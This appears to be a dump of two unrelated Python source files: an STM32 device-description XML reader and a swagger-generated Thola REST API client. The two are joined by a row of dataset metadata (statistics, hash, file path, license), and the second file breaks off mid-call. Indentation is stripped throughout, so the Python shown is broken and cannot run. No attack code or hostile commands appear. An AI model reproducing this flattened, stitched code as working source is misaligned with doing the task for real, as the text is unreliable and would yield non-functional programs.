class STMDeviceReader(XMLDeviceReader):
""" STMDeviceReader
This STM specific part description file reader knows the structure and
translates the data into a platform independent format.
"""
familyFile = None
rootpath = None
@staticmethod
def getDevicesFromFamily(family, logger=None, rootpath=None):
if rootpath is None:
rootpath = os.path.join(os.path.dirname(__file__), '..', '..', '..', '..', '..', 'STM_devices', 'mcu')
STMDeviceReader.rootpath = rootpath
STMDeviceReader.familyFile = XMLDeviceReader(os.path.join(rootpath, 'families.xml'), logger)
rawDevices = STMDeviceReader.familyFile.query("//Family[@Name='{}']/SubFamily/Mcu/@RefName".format(family))
# devices can contain duplicates due to Hx, Tx, Yx, Ix suffix!
# we treat them as single devices, since we don't care about the MCUs package
devices = []
for dev in rawDevices:
shortDev = dev[:-2] if dev.endswith('x') else dev
if all(not d.startswith(shortDev) for d in devices):
devices.append(dev)
logger.debug("STMDeviceReader: Found devices of family '{}': {}".format(family, ", ".join(devices)))
return devices
def __init__(self, deviceName, logger=None):
deviceNames = self.familyFile.query("//Family/SubFamily/Mcu[@RefName='{}']".format(deviceName))[0]
comboDeviceName = deviceNames.get('Name')
deviceFile = os.path.join(self.rootpath, comboDeviceName + '.xml')
XMLDeviceReader.__init__(self, deviceFile, logger)
self.name = deviceName
self.id = DeviceIdentifier(self.name.lower())
if logger:
logger.info("STMDeviceReader: Parsing '{}'".format(self.id.string))
# information about the core and architecture
coreLut = {'m0': 'v6m', 'm0+': 'v6m', 'm3': 'v7m', 'm4': 'v7em', 'm7': 'v7em'}
core = self.query('//Core')[0].text.replace('ARM ', '').lower()
self.addProperty('architecture', coreLut[core.replace('cortex-', '')])
if core.endswith('m4') or core.endswith('m7'):
core += 'f'
if self.id.family in ['f7'] and self.id.name not in ['745', '746', '756']:
core += 'd'
self.addProperty('core', core)
# flash and ram sizes
# The <ram> and <flash> can occur multiple times.
# they are "ordered" in the same way as the `(S-I-Z-E)` ids in the device combo name
# we must first find out which index the current self.id.size_id has inside `(S-I-Z-E)`
sizeIndexFlash = 0
sizeIndexRam = 0
matchString = "\(.(-.)*\)"
match = re.search(matchString, comboDeviceName)
if match:
sizeArray = match.group(0)[1:-1].lower().split("-")
sizeIndexFlash = sizeArray.index(self.id.size_id)
sizeIndexRam = sizeIndexFlash
rams = self.query("//Ram")
if len(rams) <= sizeIndexRam:
sizeIndexRam = 0
flashs = self.query("//Flash")
if len(flashs) <= sizeIndexFlash:
sizeIndexFlash = 0
mem_start, mem_model = stm.getMemoryForDevice(self.id)
total_ram = ram = int(rams[sizeIndexRam].text) + mem_model['sram1']
flash = int(flashs[sizeIndexFlash].text) + mem_model['flash']
if 'ccm' in mem_model:
total_ram += mem_model['ccm']
if 'backup' in mem_model:
total_ram += mem_model['backup']
if 'itcm' in mem_model:
total_ram += mem_model['itcm']
total_ram += mem_model['dtcm']
self.addProperty('ram', total_ram * 1024)
self.addProperty('flash', flash * 1024)
memories = []
# first get the real SRAM1 size
for mem, val in mem_model.items():
if any(s in mem for s in ['2', '3', 'dtcm']):
ram -= val
# add all memories
for mem, val in mem_model.items():
if '1' in mem:
memories.append({'name': 'sram1',
'access' : 'rwx',
'start': "0x{:02X}".format(mem_start['sram' if 'sram' in mem_start else 'sram1']),
'size': str(ram)})
elif '2' in mem:
memories.append({'name': 'sram2',
'access' : 'rwx',
'start': "0x{:02X}".format((mem_start['sram'] + ram * 1024) if 'sram' in mem_start else mem_start['sram2']),
'size': str(val)})
elif '3' in mem:
memories.append({'name': 'sram3',
'access': 'rwx',
'start': "0x{:02X}".format(mem_start['sram'] + ram * 1024 + mem_model['sram2'] * 1024),
'size': str(val)})
elif 'flash' in mem:
memories.append({'name': 'flash',
'access': 'rx',
'start': "0x{:02X}".format(mem_start['flash']),
'size': str(flash)})
else:
memories.append({'name': mem,
'access': 'rw' if self.id.family == 'f4' and mem == 'ccm' else 'rwx',
'start': "0x{:02X}".format(mem_start[mem]),
'size': str(val)})
self.addProperty('memories', memories)
# packaging
package = self.query("//@Package")[0]
self.addProperty('pin-count', re.findall('[0-9]+', package)[0])
self.addProperty('package', re.findall('[A-Za-z\.]+', package)[0])
# device header
family_header = "stm32{}xx.h".format(self.id.family)
self.addProperty('header', family_header)
# device defines
defines = []
if self.id.family in ['f4']:
# required for our FreeRTOS
defines.append('STM32F4XX')
cmsis_folder = os.path.join('..', '..', 'ext', 'st', "stm32{}xx".format(self.id.family), "Include")
dev_def = None
with open(os.path.join(cmsis_folder, family_header), 'r') as headerFile:
match = re.findall("if defined\((?P<define>STM32[F|L].....)\)", headerFile.read())
if match:
dev_def = stm.getDefineForDevice(self.id, match)
if dev_def is None:
logger.error("STMDeviceReader: Define not found for device '{}'".format(self.id.string))
else:
defines.append(dev_def)
self.addProperty('define', defines)
gpios = []
self.addProperty('gpios', gpios)
gpio_afs = []
self.addProperty('gpio_afs', gpio_afs)
peripherals = []
self.addProperty('peripherals', peripherals)
modules = []
self.addProperty('modules', modules)
self.modules = self.query("//IP/@InstanceName")
self.modules = sorted(list(set(self.modules)))
self.log.debug("STMDeviceReader: Available Modules are:\n" + self._modulesToString())
# add entire interrupt vectore table here.
# I have not found a way to extract the correct vector _position_ from the ST device files
# so we have to swallow our pride and just parse the header file
# ext/cmsis/stm32/Device/ST/STM32F4xx/Include/
headerFilePath = os.path.join('..', '..', 'ext', 'st', 'stm32{}xx'.format(self.id.family), 'Include', '{}.h'.format(dev_def.lower()))
headerFile = open(headerFilePath, 'r').read()
match = re.search("typedef enum.*?/\*\*.*?/\*\*.*?\*/(?P<table>.*?)} IRQn_Type;", headerFile, re.DOTALL)
if not match:
logger.error("STMDeviceReader: Interrupt vector table not found for device '{}'".format(self.id.string))
exit(1)
# print dev_def.lower(), match.group('table')
ivectors = []
for line in match.group('table').split('\n')[1:-1]:
if '=' not in line: # avoid multiline comment
continue
name, pos = line.split('/*!<')[0].split('=')
pos = int(pos.strip(' ,'))
name = name.strip()[:-5]
if self.id.family in ['f3'] and pos == 42 and name == 'USBWakeUp':
continue
ivectors.append({'position': pos, 'name': name})
self.log.debug("STMDeviceReader: Found interrupt vectors:\n" + "\n".join(["{}: {}".format(v['position'], v['name']) for v in ivectors]))
self.addProperty('interrupts', ivectors)
our_instances = ['TIM', 'UART', 'USART', 'ADC', 'CAN', 'SPI', 'I2C', 'FSMC', 'FMC', 'RNG', 'RCC', 'USB']
if self.id.family in ['l4']:
# L4 doesn't support these
our_instances.remove('FSMC')
our_instances.remove('FMC')
if self.id.family in ['f3', 'f4']:
# Only F3, F4 supports DMA
our_instances.append('DMA')
for m in self.modules:
if any(m.startswith(per) for per in our_instances):
modules.append(m)
if 'CAN' in modules:
modules.append('CAN1')
if self.id.family in ['f2', 'f3', 'f4', 'f7']:
modules.append('ID')
self.dmaFile = None
if 'DMA' in modules:
# lets load additional information about the DMA
dma_file = self.query("//IP[@Name='DMA']")[0].get('Version')
dma_file = os.path.join(self.rootpath, 'IP', 'DMA-' + dma_file + '_Modes.xml')
self.dmaFile = XMLDeviceReader(dma_file, logger)
dmas = [d.get('Name') for d in self.dmaFile.query("//IP/ModeLogicOperator/Mode[starts-with(@Name,'DMA')]")]
modules.extend(dmas)
invertMode = {'out': 'in', 'in': 'out', 'io': 'io'}
nameToMode = {'rx': 'in', 'tx': 'out', 'cts': 'in', 'rts': 'out', 'ck': 'out', # Uart
'miso': 'in', 'mosi': 'out', 'nss': 'io', 'sck': 'out', # Spi
'scl': 'out', 'sda': 'io'} # I2c
# lets load additional information about the GPIO IP
ip_file = self.query("//IP[@Name='GPIO']")[0].get('Version')
ip_file = os.path.join(self.rootpath, 'IP', 'GPIO-' + ip_file + '_Modes.xml')
self.gpioFile = XMLDeviceReader(ip_file, logger)
pins = self.query("//Pin[@Type='I/O'][starts-with(@Name,'P')]")
pins = sorted(pins, key=lambda p: [p.get('Name')[1:2], int(p.get('Name')[:4].split('-')[0].split('/')[0][2:])])
for pin in pins:
name = pin.get('Name')
# F1 does not have pin 'alternate functions' only pin 'remaps' which switch groups of pins
if self.id.family == 'f1':
pinSignals = self.gpioFile.compactQuery("//GPIO_Pin[@Name='{}']/PinSignal/RemapBlock/..".format(name))
rawAltFunctions = {a.get('Name'): a[0].get('Name')[-1:] for a in pinSignals}
altFunctions = {}
for alt_name in rawAltFunctions:
key = alt_name.split('_')[0].lower()
if key not in stm32f1_remaps:
key += alt_name.split('_')[1].lower()
if key in stm32f1_remaps:
mask = stm32f1_remaps[key]['mask']
pos = stm32f1_remaps[key]['position']
value = stm32f1_remaps[key]['mapping'][int(rawAltFunctions[alt_name])]
altFunctions[alt_name] = '{},{},{}'.format(pos, mask, value)
# Add the rest of the pins
allSignals = self.compactQuery("//Pin[@Name='{}']/Signal".format(name))
for sig in allSignals:
if not any(sig.get('Name') in name.get('Name') for name in pinSignals):
pinSignals.append(sig)
else: # F0, F3, F4 and F7
pinSignals = self.gpioFile.compactQuery("//GPIO_Pin[@Name='%s']/PinSignal/SpecificParameter[@Name='GPIO_AF']/.." % name)
altFunctions = { a.get('Name') : a[0][0].text.replace('GPIO_AF', '')[:2].replace('_', '') for a in pinSignals }
# the analog channels are only available in the Mcu file, not the GPIO file
analogSignals = self.compactQuery("//Pin[@Name='{}']/Signal[starts-with(@Name,'ADC')]".format(name))
pinSignals.extend(analogSignals)
name = name[:4].split('-')[0].split('/')[0].strip()
gpio = {'port': name[1:2], 'id': name[2:]}
gpios.append(gpio)
afs = []
for signal in [s.get('Name') for s in pinSignals]:
raw_names = signal.split('_')
if len(raw_names) < 2:
continue
if not any(m.startswith(raw_names[0]) for m in modules):
continue
instance = raw_names[0][-1]
if not instance.isdigit():
instance = ""
name = raw_names[1].lower()
mode = None
if name in nameToMode and nameToMode[name] != 'io':
mode = nameToMode[name]
af_id = None
if signal in altFunctions:
af_id = altFunctions[signal]
if signal.startswith('USART') or signal.startswith('UART'):
af = {'peripheral' : 'Uart' + instance,
'name': name.capitalize()}
if mode:
af.update({'type': mode})
if af_id:
af.update({'id': af_id})
afs.append(af)
mapName = {'rx': 'miso', 'tx': 'mosi', 'ck': 'sck'}
if signal.startswith('USART') and name in mapName:
af = {'peripheral' : 'UartSpiMaster' + instance,
'name': mapName[name].capitalize()}
if mode:
af.update({'type': mode})
if af_id:
af.update({'id': af_id})
afs.append(af)
elif signal.startswith('SPI'):
af = {'peripheral' : 'SpiMaster' + instance,
'name': name.capitalize()}
if mode:
af.update({'type': mode})
if af_id:
af.update({'id': af_id})
afs.append(dict(af))
# invertName = {'miso': 'somi', 'mosi': 'simo', 'nss': 'nss', 'sck': 'sck'}
# af.update({ 'peripheral' : 'SpiSlave' + instance,
# 'name': invertName[name].capitalize()})
# if mode:
# af.update({'type': invertMode[nameToMode[name]]})
# afs.append(af)
if signal.startswith('CAN'):
if instance == '':
instance = '1'
af = {'peripheral' : 'Can' + instance,
'name': name.capitalize()}
if mode:
af.update({'type': mode})
if af_id:
af.update({'id': af_id})
afs.append(af)
if signal.startswith('RCC'):
if 'MCO' in signal:
device_id = "" if len(raw_names) < 3 else raw_names[2]
af = {'peripheral': 'ClockOutput' + device_id}
af.update({'type': 'out'})
if af_id:
af.update({'id': af_id})
afs.append(af)
if signal.startswith('I2C'):
if name in ['scl', 'sda']:
af = {'peripheral' : 'I2cMaster' + instance,
'name': name.capitalize()}
if mode:
af.update({'type': mode})
if af_id:
af.update({'id': af_id})
afs.append(af)
if signal.startswith('TIM'):
for tname in raw_names[1:]:
tinstance = raw_names[0].replace('TIM', '')
nice_name = 'ExternalTrigger'
output_type = 'in'
if 'CH' in tname:
nice_name = tname.replace('CH', 'Channel')
output_type = None
elif 'BKIN' in tname:
nice_name = ''.join(raw_names[1:])
nice_name = nice_name.replace('BKIN', 'BreakIn').replace('COMP', 'Comp')
af = {'peripheral' : 'Timer' + tinstance,
'name': nice_name}
if output_type:
af.update({'type': output_type})
if af_id:
af.update({'id': af_id})
afs.append(af)
if signal.startswith('ADC'):
if 'exti' not in name:
af = {'peripheral' : 'Adc' + instance,
'name': name.replace('in', 'Channel').capitalize(),
'type': 'analog'}
afs.append(af)
if signal.startswith('SYS'):
if 'mco' in name:
af = {'peripheral' : signal.replace('SYS', '').replace('_', ''),
'type': 'out',
'id': '0'}
afs.append(af)
if signal.startswith('USB_OTG_FS') and raw_names[3] in ['DM', 'DP']:
af = {'peripheral' : 'Usb',
'name': raw_names[3].capitalize()}
if af_id:
af.update({'id': af_id})
else:
af.update({'id': '10'})
afs.append(af)
if signal.startswith('USB_') and raw_names[1] in ['DM', 'DP']:
af = {'peripheral': 'Usb',
'name': raw_names[1].capitalize()}
if af_id:
af.update({'id': af_id})
# For the STM32F1 the USB pins aren't enabled like other
# alternative functions, but by simply enabling the USB core.
# else:
# af.update({'id': '10'})
afs.append(af)
if signal.startswith('FSMC_') or signal.startswith('FMC_'):
if not raw_names[1].startswith('DA'):
af = {'peripheral' : 'Fsmc',
'name': raw_names[1].capitalize()}
if af_id:
af.update({'id': af_id})
afs.append(af)
# sort after key id and then add all without ids
# this sorting only affect the way the debug information is displayed
# in stm_writer the AFs are sorted again anyway
sorted_afs = [a for a in afs if 'id' in a]
sorted_afs.sort(key=lambda k: (int(k['id'].split(',')[0]), k['peripheral']))
sorted_afs.extend([a for a in afs if 'id' not in a])
for af in sorted_afs:
af['gpio_port'] = gpio['port']
af['gpio_id'] = gpio['id']
gpio_afs.append(af)
if 'CAN' in modules:
modules.remove('CAN')
def _modulesToString(self):
string = ""
char = self.modules[0][0:1]
for module in self.modules:
if not module.startswith(char):
string += "\n"
string += module + " \t"
char = module[0][0:1]
return string
def _getDeviceDefine(self):
if self.id.family not in stm32_defines:
return None
# get the defines for this device family
familyDefines = stm32_defines[self.id.family]
# get all defines for this device name
devName = 'STM32{}{}'.format(self.id.family[0].upper(), self.id.name)
# Map STM32F7x8 -> STM32F7x7
if self.id.family == 'f7' and devName[8] == '8':
devName = devName[:8] + '7'
deviceDefines = sorted([define for define in familyDefines if define.startswith(devName)])
# if there is only one define thats the one
if len(deviceDefines) == 1:
return deviceDefines[0]
# now we match for the size-id.
devNameMatch = devName + 'x{}'.format(self.id.size_id.upper())
for define in deviceDefines:
if devNameMatch <= define:
return define
# now we match for the pin-id.
devNameMatch = devName + '{}x'.format(self.id.pin_id.upper())
for define in deviceDefines:
if devNameMatch <= define:
return define
return None
def __repr__(self):
return self.__str__()
def __str__(self):
return "STMDeviceReader({}, [\n{}])".format(os.path.basename(self.name), ",\n".join(map(str, self.properties)))
| 34.758
| 138
| 0.619368
|
4a10fea6f0af8be304dba1ce872e281354577f3b
| 39,444
|
py
|
Python
|
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | 1
|
2021-12-28T18:53:52.000Z
|
2021-12-28T18:53:52.000Z
|
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
thola_client/api/read_api.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
"""
Thola
REST API for Thola. For more information look at our Github : https://github.com/inexio/thola # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from thola_client.api_client import ApiClient
class ReadApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def hardware_health(self, body, **kwargs): # noqa: E501
"""Reads out hardware health data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.hardware_health(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadHardwareHealthRequest body: Request to process. (required)
:return: ReadHardwareHealthResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.hardware_health_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.hardware_health_with_http_info(body, **kwargs) # noqa: E501
return data
def hardware_health_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out hardware health data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.hardware_health_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadHardwareHealthRequest body: Request to process. (required)
:return: ReadHardwareHealthResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method hardware_health" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `hardware_health`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/hardware-health', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadHardwareHealthResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_available_components(self, body, **kwargs): # noqa: E501
"""Returns the available components for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_available_components(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadAvailableComponentsRequest body: Request to process. (required)
:return: ReadAvailableComponentsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_available_components_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_available_components_with_http_info(body, **kwargs) # noqa: E501
return data
def read_available_components_with_http_info(self, body, **kwargs): # noqa: E501
"""Returns the available components for the device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_available_components_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadAvailableComponentsRequest body: Request to process. (required)
:return: ReadAvailableComponentsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_available_components" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_available_components`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/available-components', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadAvailableComponentsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_count_interfaces(self, body, **kwargs): # noqa: E501
"""Counts the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_count_interfaces(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCountInterfacesRequest body: Request to process. (required)
:return: ReadCountInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_count_interfaces_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_count_interfaces_with_http_info(body, **kwargs) # noqa: E501
return data
def read_count_interfaces_with_http_info(self, body, **kwargs): # noqa: E501
"""Counts the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_count_interfaces_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCountInterfacesRequest body: Request to process. (required)
:return: ReadCountInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_count_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_count_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/count-interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadCountInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_cpu_load(self, body, **kwargs): # noqa: E501
"""Read out the CPU load of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cpu_load(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCPULoadRequest body: Request to process. (required)
:return: ReadCPULoadResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_cpu_load_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_cpu_load_with_http_info(body, **kwargs) # noqa: E501
return data
def read_cpu_load_with_http_info(self, body, **kwargs): # noqa: E501
"""Read out the CPU load of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cpu_load_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadCPULoadRequest body: Request to process. (required)
:return: ReadCPULoadResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cpu_load" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_cpu_load`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/cpu-load', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadCPULoadResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_disk(self, body, **kwargs): # noqa: E501
"""Reads out disk data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_disk(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadDiskRequest body: Request to process. (required)
:return: ReadDiskResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_disk_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_disk_with_http_info(body, **kwargs) # noqa: E501
return data
def read_disk_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out disk data of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_disk_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadDiskRequest body: Request to process. (required)
:return: ReadDiskResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_disk" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_disk`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/disk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadDiskResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_interfaces(self, body, **kwargs): # noqa: E501
"""Reads out data of the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_interfaces(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadInterfacesRequest body: Request to process. (required)
:return: ReadInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_interfaces_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.read_interfaces_with_http_info(body, **kwargs) # noqa: E501
return data
def read_interfaces_with_http_info(self, body, **kwargs): # noqa: E501
"""Reads out data of the interfaces of a device. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_interfaces_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReadInterfacesRequest body: Request to process. (required)
:return: ReadInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `read_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/read/interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReadInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
